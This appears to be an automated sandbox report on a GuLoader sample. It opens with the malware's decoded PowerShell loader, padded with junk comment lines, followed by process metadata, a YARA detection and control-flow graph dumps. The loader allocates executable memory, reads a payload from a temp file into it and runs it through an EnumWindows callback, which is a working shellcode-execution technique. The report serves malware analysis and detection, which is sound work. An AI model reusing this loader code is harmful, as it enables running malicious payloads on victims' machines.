 # a n a l y s e m   F r y d e f u l 1   T u b e r   K u s i n e   D y k k e   E m p a t i s k k o   F r d i g g r 4   O r g a n i s 1   P a l m a t i   M E D D E L M A   M e n s u r a t i o 8   t a b e r s r   F I R M I N T E R A   A f l a d s k r m m   B a k l y g t e r n 9   P E A S A N T   t i l g   S t a r e d 6   B o r t s l g e n   S V E L T E S K E L   C i l i i u m p o l 1   B E V I D S T G R G   d d n i n g   G A M E S T R E S S   p l j n i n g   S p o n d i s k e 8   N i d o   k r a k i l e r n   A f s e r i l l 4    
 # U n d e r l e v e   A m y o s t h e 8   O r k n e y   s t u d s n i n g e   s e r a u b   D A N N E B R O G   S v r d l i   T r i o p s s k a t 2   R O T T E F L D E R   K v a r t   s h a w l l i k e m   d a a s   K A S T N I N G E   F e e d e 2   e m b e d s e k s   V e l g r e r   C o g i t a   P a h a   b r n d s   T R Y K M A   S y n l 9   C l i t o r o m 9   A n n u n 8   U N I R   U N W E   O p i n i   U d a d v e   i n d i a n   R U B N   A l i g h t   S t v l e t t e    
 # a l l o p a   S e s a   A n i m a l   I M M I G R A   S p r j t e n   N o o d l i n g   L a c q u e r 4   B B C M U T T E   a b u z   A l g e v k s   C h a r m e t r 1   T h e n c e f o r 2   T i n s e l r 1   S l v s n o r e   u n s a w   H U L W O   h j t s i d   a f s l    
 # R O S E O   F A B R I K E R   P E N T   S l a g   q u a v e r e d d e   t r e d o b l   c e n o g e n   U H J L P S   b e g r l i   P R O B L E M   T h e r a p s i d 4   T r n r m i c r o p   U n a r 7   P R E J U   H v i l e d a g e n   L y g t e p l w h i 5   L a v i s h e s 1   b o o k s e l l i n   s o e k o e s k v i   d o r t   R e n d e g r a v n    
 # N i v e a 5   c o n c l u s i b   S P E E R I N G   S u p e r o f f i c   G a n g l i n j e s 3   a s c h   R e s i d e n   S T J F I L T R E   u n i t t e   L E G E R E D E   s t e r   i d e e r   O p k l b b e n v n   S e r e a n   s l a v e    
 # t y r a n n i   b o g e n s   H A N D E L S F O R   E p i k e r   V E D R O E   P a r e   I n t r v a s   P e t r o g e n y 2   A s s e n d e n   S u g a r i n g   i c h t h y o s a u    
 # L a n d m a s s 4   R b a r e s p 6   P r e c e l e b r a   P a s i g a n g g 5   U n r e n u n c   B A G S T   S T J G R N   U n p r e f e r   T M R E   L o d t r k n i n g   C o n v 1   V A E R N E   h o l a   e x p e r i m e   T y k k e s p l a d 1   E U P L   P o s t p r o j e   P l o v f u r e s 8   A r b e j d 3   t o b a k   R a d i o 6   A S P I Q   C o n r a d h e k 1   S n a r i 9   I m i t a t i 8   K a g e m a d 7   A f g u d s    
 # U N P H   F r e r 8   R e d i   H o v e 4   D A T A B A S E S   T I L B A G   R o t t e r n e   s a n s e o r g a n   s q u i r t   O m o p l a t o s c   R s k n   K y l l 9   T O N E D S K I F   C o a c 7   s p o n g y s   K a t t e 7   H y d r o t h e r a 6   C O M P R E H E   S a x o   P A P I R T   b a r y e   r a t o n f o r e d    
 # u n d e   A M P H I P O D   S p r o g f o 6   b o n d   A L T S T   C h a n g o a n a n   P A U R O P   F o r m i n   L o v p r i s f r e 7   E x c o c t i 6   T A K T S   A n t i e m p i r i 7   G a r n e r i n g e   P L A N X T   K N I V M   v r d i r e d u   P o l y c h o r   e l i s o r s h   V i t e s s e 2   s e s s i   B o r t l e d t e   K A N D I S E N K   G i n s i 4   K U N S T M U S E   P a r e r i n   S Q U U S H O K U L   m a t r i c u l a t   D i m s s s m 4   S E S T I A N   R e h a b i l i t    
  
  
 A d d - T y p e   - T y p e D e f i n i t i o n   @ "  
 u s i n g   S y s t e m ;  
 u s i n g   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s ;  
 p u b l i c   s t a t i c   c l a s s   F o r l y 9 1  
 {  
 [ D l l I m p o r t ( " g d i 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m F o n t s A ( s t r i n g   F A B L E , u i n t   K o n g e h u s , i n t   D i s v o i c e a o , i n t   F o r l y 9 0 , i n t   M a i n a s c h e , i n t   M o r a l i t 1 , i n t   T O R E A D O ) ;  
 [ D l l I m p o r t ( " K E R N E L 3 2 " ,   E n t r y P o i n t = " C r e a t e F i l e A " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   V i a c ( [ M a r s h a l A s ( U n m a n a g e d T y p e . L P S t r ) ] s t r i n g   F A B L E , u i n t   K o n g e h u s , i n t   D i s v o i c e a o , i n t   F o r l y 9 0 , i n t   M a i n a s c h e , i n t   M o r a l i t 1 , i n t   T O R E A D O ) ;  
 [ D l l I m p o r t ( " n t d l l " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   N t A l l o c a t e V i r t u a l M e m o r y ( i n t   F o r l y 9 6 , r e f   I n t 3 2   r u s t n i n g e r , i n t   P o i n t s m e n h , r e f   I n t 3 2   F o r l y 9 , i n t   W O R K S H I P M E , i n t   F o r l y 9 7 ) ;  
 [ D l l I m p o r t ( " K E R N E L 3 2 " ,   E n t r y P o i n t = " R e a d F i l e " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   C D A C ( i n t   P o i n t s m e n h 0 , u i n t   P o i n t s m e n h 1 , I n t P t r   P o i n t s m e n h 2 , r e f   I n t 3 2   P o i n t s m e n h 3 , i n t   P o i n t s m e n h 4 ) ;  
 [ D l l I m p o r t ( " U S E R 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m W i n d o w s ( I n t P t r   P o i n t s m e n h 5 , i n t   P o i n t s m e n h 6 ) ;  
  
 }  
 " @  
 # H O V E D B Y   V E L S E S M   E v e r e d   P r o a m a t e u   p a a s k y n d   H a a n d e v e n   f o r l b e r n   b e t h a n k i n g   e u r o v i s i o   F o r u d d i s    
 $ F o r l y 9 2 = " $ e n v : t e m p "   +   " \ O V E R . d a t "  
 # b o o k l i f t m   F o r s a e d e u   U n d e r s   b o r t f o r k   d e t e   L a m p a   B l a n c h e d 6   T a w p i e m a s t   t i l s t a n d   k a r t o n n   B e v i l g e n d 1   B a g g r u n d 1   T a n t a l i s e 2   B l o d t 3    
 $ F o r l y 9 3 = 0 ;  
 $ F o r l y 9 9 = 1 0 4 8 5 7 6 ;  
 $ F o r l y 9 8 = [ F o r l y 9 1 ] : : N t A l l o c a t e V i r t u a l M e m o r y ( - 1 , [ r e f ] $ F o r l y 9 3 , 0 , [ r e f ] $ F o r l y 9 9 , 1 2 2 8 8 , 6 4 )  
 # S v k l i n g e r n 1   b l a n k   G u t t e r s s e   U H Y G G E N S I L   U f o r d   R i g s g r e   B L O K N I   E V A N E S   T r a c t a b   J u l e n e g   b n f a l d e l s   M I S L   o m s t   T e s t i k l e n 6   F i l m   p a m p a n g o k o    
 $ F o r l y 9 4 = [ F o r l y 9 1 ] : : V i a c ( $ F o r l y 9 2 , 2 1 4 7 4 8 3 6 4 8 , 1 , 0 , 3 , 1 2 8 , 0 )  
 # L e n s a f t a l e   N a t u 8   F O R S A M L I N   I n k o   S U B M O D E A   e l e f   c a t a r i n e s   B r a n c h e o r   N o n f a n 5   M i s w 7   B i l l   z o e f o r   P a l a e   K h a r u n   r e t r i b u t i   S u f f r a g e t   L i n s e r n 7   E k s i l e r 9   c a t a l y s t l e   V a g i f   S k r l l e r a n i   R E T S A   T h r o c k s i   I n e f f i c a c 8   g e n e r a   U l v e u n g   N i g h t w a r d n 2   K V A D R A T T A    
 $ F o r l y 9 5 = 0 ;  
 # L a n d s r e t p o 4   O p s v u l 3   K o n t r a   p r e d e   B R A N D S L   S K O V D A H L U   d e c a n a l s a   k a o l i n s a   g r u t t e d e   S t r m f o r b   P s e u d 6   H e p t a r c 8   S e c r   b i l l o w i n   b a t c   F I T T A B L E   P i n k n e s s e   P S O C I D A E C H    
 [ F o r l y 9 1 ] : : C D A C ( $ F o r l y 9 4 , $ F o r l y 9 3 , 5 9 1 7 9 , [ r e f ] $ F o r l y 9 5 , 0 )  
 # t h e m   S P A T A L   S t a l l e r o 8   P i s t i   O e d i c n   C A N N I B A L   L y k k e d e s s 7   t r e d i v e a a r   R e j s t f 4   S U P P E T E R R   F l e r d o b 1   I n o r d i n 5   K N B E   S t a t i   R e s t a u r a t 8   L i t h y s 8   L E T T R O   l i g r o i n s r   D r b t   d e g a s s e s   B l r e r o 8    
 [ F o r l y 9 1 ] : : E n u m W i n d o w s ( $ F o r l y 9 3 ,   0 )  
  
 
      Imagebase:0xfc0000
      File size:430592 bytes
      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000012.00000002.806121442.0000000009200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
      Reputation:high

      Target ID:20
      Start time:13:32:59
      Start date:12/05/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7c9170000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:24
      Start time:13:33:31
      Start date:12/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdline
      Imagebase:0x200000
      File size:2170976 bytes
      MD5 hash:350C52F71BDED7B99668585C15D70EEA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Reputation:moderate

      Target ID:25
      Start time:13:33:36
      Start date:12/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA741.tmp" "c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP"
      Imagebase:0x800000
      File size:43176 bytes
      MD5 hash:C09985AE74F0882F208D75DE27770DFA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Reset < >

        Execution Graph

        Execution Coverage:5%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:17.6%
        Total number of Nodes:17
        Total number of Limit Nodes:1
        execution_graph 16189 77135e8 16190 77135fb 16189->16190 16193 7713400 16190->16193 16194 7713423 16193->16194 16195 7713463 16194->16195 16197 77133a8 16194->16197 16198 77133bc 16197->16198 16201 77130a8 16198->16201 16199 77133e9 16199->16195 16202 77130c1 16201->16202 16203 771312a 16202->16203 16206 7712b78 16202->16206 16203->16199 16208 7712ca8 16206->16208 16209 7712b9e 16206->16209 16208->16199 16209->16208 16210 7711a68 16209->16210 16211 7715d78 CreateNamedPipeW 16210->16211 16213 7715eaa 16211->16213

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 145 7711a68-7715de2 148 7715de4-7715dea 145->148 149 7715ded-7715df6 145->149 148->149 150 7715e15-7715e19 149->150 151 7715df8-7715e14 149->151 152 7715e1b-7715e32 150->152 153 7715e3a-7715ea8 CreateNamedPipeW 150->153 151->150 152->153 155 7715eb1-7715eef 153->155 156 7715eaa-7715eb0 153->156 160 7715ef1-7715ef5 155->160 161 7715f04-7715f08 155->161 156->155 160->161 162 7715ef7-7715efa 160->162 163 7715f19 161->163 164 7715f0a-7715f16 161->164 162->161 164->163
        APIs
        • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 07715E98
        Memory Dump Source
        • Source File: 00000012.00000002.802808254.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_7710000_powershell.jbxd
        Similarity
        • API ID: CreateNamedPipe
        • String ID:
        • API String ID: 2489174969-0
        • Opcode ID: f5d2a2c654fc26d52111fdc56b28f4c2ea6926150782fb96827372ef46d45d35
        • Instruction ID: 0196478eb1c8df2859a504ede0e18112a28e831c810b2339c09069859a951a45
        • Opcode Fuzzy Hash: f5d2a2c654fc26d52111fdc56b28f4c2ea6926150782fb96827372ef46d45d35
        • Instruction Fuzzy Hash: 7B51F5B0D01348EFDB14CFA9C984B9EFBF2AF88344F25852AE418AB260D7749955CF50
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 229 7711ca0-7711e8b 249 7711e92-77120ab 229->249 276 77120b1-77120c1 249->276 277 7712280-771244f 249->277 280 77120c3-77120cd 276->280 281 77120cf 276->281 318 7712455-771254a 277->318 319 771254f-7712566 277->319 283 77120d4-77120d6 280->283 281->283 285 77120e0-77120ee 283->285 286 77120d8-77120de 283->286 287 77120f0-771227f 285->287 286->287 341 77126a3-77126bb 318->341 326 7712576-7712584 319->326 327 7712568-7712574 319->327 329 771258a-771269b 326->329 327->329 329->341 342 77126c2-77126f5 341->342 343 77126bd 341->343 348 7712702 342->348 349 77126f7 342->349 343->342 349->348
        Memory Dump Source
        • Source File: 00000012.00000002.802808254.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_7710000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6611a7b91de85866fdb64758c5ff761380e5110564e03cdd9c53b8fb54dbc39b
        • Instruction ID: 85b3d8b71ca15b7ecc704962a3e270e899bb34afcf3f1a4ac7dbaff270486954
        • Opcode Fuzzy Hash: 6611a7b91de85866fdb64758c5ff761380e5110564e03cdd9c53b8fb54dbc39b
        • Instruction Fuzzy Hash: 49429030A00619DFDB24DB64CC51BADB776EF89300F1185AAE50A7B391DF75AD81CBA0
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 166 faa070-faa071 167 faa073-faa079 166->167 168 faa007-faa00e 166->168 169 faa07b-faa0b7 167->169 170 faa00f-faa012 167->170 168->170 173 faa01a-faa045 GetFileAttributesW 170->173 174 faa014-faa017 170->174 175 faa04e-faa06b 173->175 176 faa047-faa04d 173->176 174->173 176->175
        APIs
        • GetFileAttributesW.KERNELBASE(00000000), ref: 00FAA038
        Memory Dump Source
        • Source File: 00000012.00000002.799132663.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_fa0000_powershell.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: 2e81bd46e8cc168fd29ec37fee4e7b8377990408e9992a7babd9ea2363543fc9
        • Instruction ID: aa89c46484094f0c9b99538bfbd5d89c4defbe95a7e062aefec6590cc5e2b513
        • Opcode Fuzzy Hash: 2e81bd46e8cc168fd29ec37fee4e7b8377990408e9992a7babd9ea2363543fc9
        • Instruction Fuzzy Hash: E111AFB18042159FCB54CF59D840A8ABBB0FF45318F15CA5AE048EB265D375DD0ACBE1
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 182 fa9fc0-faa012 186 faa01a-faa045 GetFileAttributesW 182->186 187 faa014-faa017 182->187 188 faa04e-faa06b 186->188 189 faa047-faa04d 186->189 187->186 189->188
        APIs
        • GetFileAttributesW.KERNELBASE(00000000), ref: 00FAA038
        Memory Dump Source
        • Source File: 00000012.00000002.799132663.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_fa0000_powershell.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: d9ca26b34e92b8a498b03b6cc3ed4be061a4aac2d0eb56d7c863e12e73543082
        • Instruction ID: 928a340fe5c60070230ddccbca6fb4d4b6e025982df1191aa4b456e7b43c7a96
        • Opcode Fuzzy Hash: d9ca26b34e92b8a498b03b6cc3ed4be061a4aac2d0eb56d7c863e12e73543082
        • Instruction Fuzzy Hash: 5E1133B1D006199BCB14CF9AD844B9EFBB4FF49324F15811AD819B7700C774AA05CFA1
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 192 fa58f4-faa012 196 faa01a-faa045 GetFileAttributesW 192->196 197 faa014-faa017 192->197 198 faa04e-faa06b 196->198 199 faa047-faa04d 196->199 197->196 199->198
        APIs
        • GetFileAttributesW.KERNELBASE(00000000), ref: 00FAA038
        Memory Dump Source
        • Source File: 00000012.00000002.799132663.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_fa0000_powershell.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: ece46354509f4c123f49a47105e4c93632ac0fa9b0f8873572aeec9916d5b074
        • Instruction ID: d74c65b504a904798a79d41978670d42c236fd80a6d1bafe71ea01449334db04
        • Opcode Fuzzy Hash: ece46354509f4c123f49a47105e4c93632ac0fa9b0f8873572aeec9916d5b074
        • Instruction Fuzzy Hash: 47211EB1D046199BCB10CFAAD844B9EFBB4FB49324F05812AE819A7640C774A904CFA1
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000012.00000002.798138532.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_dbd000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 114164c1f85d352e34ed4fa993dd5bc0b1060b36968502020243a1bd68c4cc66
        • Instruction ID: 8b0dcdc93cc5d308494de553be1e0063dd1db74b44132e42ecc0b3b49c1025f6
        • Opcode Fuzzy Hash: 114164c1f85d352e34ed4fa993dd5bc0b1060b36968502020243a1bd68c4cc66
        • Instruction Fuzzy Hash: 5B01F270408340EAE7209E21CCC4BA7FB99EF41768F1C801AED8A5B286D3799C05CAB1
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000012.00000002.798138532.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_dbd000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c5da180751e8670896215e30e8cb3e8c934fd9ae932613c8057ba02378535253
        • Instruction ID: 0947d2e0daa135c6ee141f8546373c6f67be5d2f41ac7514a90c9e52cd2c1216
        • Opcode Fuzzy Hash: c5da180751e8670896215e30e8cb3e8c934fd9ae932613c8057ba02378535253
        • Instruction Fuzzy Hash: 7701406140E3C09ED7128B258C94B52BFB4DF53224F1D81DBD9859F197D2695C48CB72
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000012.00000002.799132663.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_fa0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5d41b78e2c20600b598b98d4925b98676f23024296f14d738984b8b37930d1d5
        • Instruction ID: f872caaef8f152849abf594d884320df2c6f0082bf86c70105e4649b3e20ed6f
        • Opcode Fuzzy Hash: 5d41b78e2c20600b598b98d4925b98676f23024296f14d738984b8b37930d1d5
        • Instruction Fuzzy Hash: 63A2B030B042189BDF28EB75CC61BAE35A7EBC4744F24806D960A9B394DF795DC18BE1
        Uniqueness

        Uniqueness Score: -1.00%